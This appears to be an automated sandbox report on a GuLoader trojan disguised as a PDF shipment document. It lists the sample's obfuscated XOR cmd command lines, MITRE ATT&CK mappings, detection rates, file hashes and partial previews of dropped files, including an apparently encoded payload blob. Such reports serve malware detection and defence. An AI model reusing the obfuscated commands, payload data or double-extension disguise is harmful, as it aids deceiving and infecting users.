    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0363032C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B2D2024^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x55183929^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x563A7D2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5079653D^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0D697C35^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6478^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x572D3037^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x11307537^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0C75752C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19686375^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697569^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A64721C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630720^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x583D132C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x553C7D2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7965^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x50792774^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697C2C^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6678^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4C2A3037^962155845"Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Command and Scripting Interpreter    		Path Interception1
    Access Token Manipulation    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts1
    Native API    		Boot or Logon Initialization Scripts11
    Process Injection    		1
    Access Token Manipulation    		LSASS Memory1
    Time Based Evasion    		Remote Desktop Protocol1
    Clipboard Data    		Exfiltration Over Bluetooth1
    Application Layer Protocol    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager2
    File and Directory Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information    		NTDS13
    System Information Discovery    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Time Based Evasion    		LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common11
    Obfuscated Files or Information    		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 679174 Sample: Original Shipment_Document.... Startdate: 05/08/2022 Architecture: WINDOWS Score: 84 50 Multi AV Scanner detection for submitted file 2->50 52 Yara detected GuLoader 2->52 54 Uses an obfuscated file name to hide its real file extension (double extension) 2->54 56 6 other signatures 2->56 8 Original Shipment_Document.PDF.exe 30 2->8         started        process3 file4 46 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->46 dropped 48 C:\Users\user\AppData\Local\...\System.dll, PE32 8->48 dropped 58 Obfuscated command line found 8->58 12 cmd.eXe 8->12         started        14 cmd.eXe 8->14         started        16 cmd.eXe 8->16         started        18 61 other processes 8->18 signatures5 process6 process7 20 Conhost.exe 12->20         started        22 Conhost.exe 12->22         started        24 Conhost.exe 14->24         started        26 Conhost.exe 14->26         started        34 2 other processes 16->34 28 Conhost.exe 18->28         started        30 Conhost.exe 18->30         started        32 Conhost.exe 18->32         started        36 51 other processes 18->36 process8 38 Conhost.exe 20->38         started        40 Conhost.exe 20->40         started        42 Conhost.exe 20->42         started        44 Conhost.exe 24->44         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Original Shipment_Document.PDF.exe32%VirustotalBrowse
    Original Shipment_Document.PDF.exe22%ReversingLabsWin32.Trojan.Guloader

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll1%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll3%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\nse53EC.tmp\nsExec.dll0%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nse53EC.tmp\nsExec.dll4%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nse53EC.tmp\nsExec.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nsis.sf.net/NSIS_ErrorErrorOriginal Shipment_Document.PDF.exefalse
      		high

      World Map of Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:35.0.0 Citrine
      Analysis ID:679174
      Start date and time: 05/08/202211:23:092022-08-05 11:23:09 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 6s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Original Shipment_Document.PDF.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:149
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.troj.evad.winEXE@185/6@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 62.9% (good quality ratio 61.7%)
      • Quality average: 88.6%
      • Quality standard deviation: 21.6%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 51
      • Number of non-executed functions: 32
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Adjust boot time
      • Enable AMSI

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 23.211.6.115
      • Excluded domains from analysis (whitelisted): www.bing.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dllbf.exeGet hashmaliciousBrowse
        bf.exeGet hashmaliciousBrowse
          SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
            SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
              hVAj77o331.exeGet hashmaliciousBrowse
                hVAj77o331.exeGet hashmaliciousBrowse
                  invesssss.exeGet hashmaliciousBrowse
                    Lh6P9rwCju.exeGet hashmaliciousBrowse
                      invesssss.exeGet hashmaliciousBrowse
                        Lh6P9rwCju.exeGet hashmaliciousBrowse
                          pKAW7R09ha.exeGet hashmaliciousBrowse
                            Rnp7gsZAtH.exeGet hashmaliciousBrowse
                              0xOTqBLwqS.exeGet hashmaliciousBrowse
                                TgDofCOcVv.exeGet hashmaliciousBrowse
                                  pKAW7R09ha.exeGet hashmaliciousBrowse
                                    Y1VipMk6vh.exeGet hashmaliciousBrowse
                                      Rnp7gsZAtH.exeGet hashmaliciousBrowse
                                        xoFqJKku2Y.exeGet hashmaliciousBrowse
                                          LXYLAhHyUd.exeGet hashmaliciousBrowse
                                            0xOTqBLwqS.exeGet hashmaliciousBrowse

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\nse53EC.tmp\System.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):12288
                                              Entropy (8bit):5.814115788739565
                                              Encrypted:false
                                              SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                              MD5:CFF85C549D536F651D4FB8387F1976F2
                                              SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                              SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                              SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: bf.exe, Detection: malicious, Browse
                                              • Filename: bf.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, Detection: malicious, Browse
                                              • Filename: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, Detection: malicious, Browse
                                              • Filename: hVAj77o331.exe, Detection: malicious, Browse
                                              • Filename: hVAj77o331.exe, Detection: malicious, Browse
                                              • Filename: invesssss.exe, Detection: malicious, Browse
                                              • Filename: Lh6P9rwCju.exe, Detection: malicious, Browse
                                              • Filename: invesssss.exe, Detection: malicious, Browse
                                              • Filename: Lh6P9rwCju.exe, Detection: malicious, Browse
                                              • Filename: pKAW7R09ha.exe, Detection: malicious, Browse
                                              • Filename: Rnp7gsZAtH.exe, Detection: malicious, Browse
                                              • Filename: 0xOTqBLwqS.exe, Detection: malicious, Browse
                                              • Filename: TgDofCOcVv.exe, Detection: malicious, Browse
                                              • Filename: pKAW7R09ha.exe, Detection: malicious, Browse
                                              • Filename: Y1VipMk6vh.exe, Detection: malicious, Browse
                                              • Filename: Rnp7gsZAtH.exe, Detection: malicious, Browse
                                              • Filename: xoFqJKku2Y.exe, Detection: malicious, Browse
                                              • Filename: LXYLAhHyUd.exe, Detection: malicious, Browse
                                              • Filename: 0xOTqBLwqS.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\nse53EC.tmp\nsExec.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):7168
                                              Entropy (8bit):5.298362543684714
                                              Encrypted:false
                                              SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                                              MD5:675C4948E1EFC929EDCABFE67148EDDD
                                              SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                                              SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                                              SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                              • Antivirus: Metadefender, Detection: 4%, Browse
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen\Integrationsprvens.Adg72

                                              Download File
                                              Process:C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
                                              File Type:ASCII text, with very long lines, with no line terminators
                                              Category:dropped
                                              Size (bytes):56802
                                              Entropy (8bit):3.999776572782735
                                              Encrypted:false
                                              SSDEEP:1536:MiSOEpxqtPV0vXzt3Ov2Kh2+ir/qY3TAK7tgjofP:QpeSPztK2YVK7iE
                                              MD5:7C22C978F9497BB753456B3AA833F7DE
                                              SHA1:5566F37ED12035AD659E8E71B09A46FC3A907D27
                                              SHA-256:8126292C7A2EE04C5D5286BCD0584CF8FF39745F17E28DE70A72CBF1EBCA900B
                                              SHA-512:C33B835EFC5EB8C19A6429E588D8BD6BBD6C26DA379B7F24A6322CDF09094DF777C7C1DBB0B41E43EE5F24D5A11374E2D95135E70EC4285C0C28A8D3F764424B
                                              Malicious:false
                                              Preview:751B5626ED1D59DCECA17FC07B6590E02267FE3B2CD7A757A3164D2442E94F22E7417624324FB00CADEF5E125A7A344E60BED74BC30F36CD1FC851B3AD4732C6EA226EB072F8E714BFA6387A8D207880017E9AC6FEEBE6A73C2845B2010C4322E8DC529575F955085F49CFD5389BA20DB5FE9CCA8B739E136A7672B5D2F4472D326B8961AC7A1D2BE941B3207256738921359864F7DCD7AEC49C3C1E7CC69AF9A2AF9CB338F2002503BA46ECAC9CB7044F3290D90BAC2852B3BB0083DC03E4D5EBA5CEA9D0A787F3862CCD2C6EC3325DEACC5CB5818C829C68E98E4C9833F007B86693B4C6776056B342C33E34C5201C378F536C73A444DA46B37933404F6CDE80F0FF3BEE724769B921E9A924F35714874EB7DC63C16604B0487C1A2F1D201C1C8B5CD77378607E2DF7037056A2043753275C1A55BA8CD1CFEC4571E57D5A2331ED816A72AD23FF030A715BC4CDEF157B56B25E576F4F59EB903849D9446368C20AC6283FDD2627141ED25B1A794C55D1FDD15E1F6F5B78A58957BA7871754426D16868771513FAD305AEA8DD85058FC14F2437A34BBC4DEBA70E52D1ACE512EA32218DFED4211F0B5EA40ECD74C2062AA179E6DD0BBE910ADAA8CC1974916BD62BE762ED036F9C2A8BDF043DBB4411C94797F2B82DE9BA0A257AC9E7458DE83CC1AAF0A8D0249200F483B276BFE5D91DFE0787

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen\format-text-bold-symbolic.svg

                                              Download File
                                              Process:C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:dropped
                                              Size (bytes):1330
                                              Entropy (8bit):4.276818433927216
                                              Encrypted:false
                                              SSDEEP:24:2dPnnxu3tlACrmYbJ1BtxhUuLos3CrmYbJ1qtxhUuLosN:cfnz6XXNUuLos36XcNUuLosN
                                              MD5:B0BE3814C6303C5B8C080D654FDF2EA7
                                              SHA1:8231CACDA98442D068D80EC063CE75DC05AE7A2E
                                              SHA-256:4A71E8903E3673A98AB8D8BAC7579F7EA2D8C016ADC7ABC6EA23F5565D8643DA
                                              SHA-512:62F55F19DFE1A8D9B12CD4968401CA19ED332298FBA3ED9DCF714F5E41BA41ED1F8DE07F9F55C90E6B461B73A5F34C2E9C4F505B736960BE814ACB3779F6937A
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 5 3 v 2 h 6 c 0.429688 0 1 0.613281 1 1 v 1 h -5 c -0.917969 0 -1.734375 0.378906 -2.25 0.964844 c -0.515625 0.585937 -0.742188 1.324218 -0.738281 2.046875 c 0.007812 0.71875 0.246093 1.445312 0.757812 2.027343 c 0.515625 0.578126 1.320313 0.960938 2.230469 0.960938 h 7 v -7 c 0 -1.632812 -1.320312 -3 -3 -3 z m 2 6 h 5 v 2 h -5 c -0.398438 0 -0.578125 -0.117188 -0.730469 -0.289062 c -0.152343 -0.167969 -0.253906 -0.441407 -0.257812 -0.722657 c 0 -0.277343 0.09375 -0.539062 0.238281 -0.703125 c 0.148438 -0.164062 0.328125 -0.285156 0.75 -0.285156 z m 0 0"/>. <path d="m 4 3 v 2 h 5 c 0.429688 0 1 0.613281 1 1 v 1 h -5 c -0.917969 0 -1.734375 0.378906 -2.25 0.964844 c -0.515625 0.585937 -0.742188 1.324218 -0.738281 2.046875 c 0.007812 0.71875 0.246093 1.445312 0.757812 2.027343 c 0.515625 0.578126 1.320313 0.960938

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen\location-services-disabled-symbolic.symbolic.png

                                              Download File
                                              Process:C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):285
                                              Entropy (8bit):7.002882763277556
                                              Encrypted:false
                                              SSDEEP:6:6v/lhPysuci+aOXTk585U+UliBie7cQkF2HTtWAJdp:6v/7Oci+aOogUVli9AZWBz
                                              MD5:91B30844C5145188A9DCE697271B8BCF
                                              SHA1:69C3F0AFA91A3E725A26017EC282499152500DC9
                                              SHA-256:3B79DEE63724F1BAFFB1E51D55CB96CEB2849C0536000BE3A6C848CE36230049
                                              SHA-512:6AAF7F986B121484A96B3C85CA382A471DC2B6CFC87C7D7C1838714217C17199649A98825AFF70E62CD0DC2E9C6A3DDF41E4CC743CD44977A452F494340BD7C7
                                              Malicious:false
                                              Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...1J.A........Q...!.I....V.B:.Li.5.F0'.Hi'X.....h.op\t...S..vwh...t..a...^1B/C..2....:Y..W.E.Kl`.W.......@......w..s&..x..V*.Y3..c.|e.......%.......y..).y8P#c..3.xL..`..c..{......S...R.1.~.....di....W-z._.....IEND.B`.

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen\uforfrdetheden.Rid

                                              Download File
                                              Process:C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):99762
                                              Entropy (8bit):7.345890691572136
                                              Encrypted:false
                                              SSDEEP:1536:C42UhrrhyVKSRG5jbu3E4CIJB8SkPoVcrlCDh4AusPrji0Dz:GG0KSRCnu3E9qdbos94AuuPP/
                                              MD5:251EE827C992B4E481634030C2E681F3
                                              SHA1:88065FA2EDAE7B94B6891675DF8A9028DC5F28E6
                                              SHA-256:E9DD8E6A46B89E22E83743D0578339458E7C2CE719BFF5FDD9FDC66652DB161A
                                              SHA-512:6042BAD2119F19C0355DC43C7CC0F03A5943C524252DC7F0DA0FF4ED254D9486EC3C485BBF0D8010CF5CBF2A22B5F2BFFA8247D87EEFFEF91A72B891FCFAD49D
                                              Malicious:false
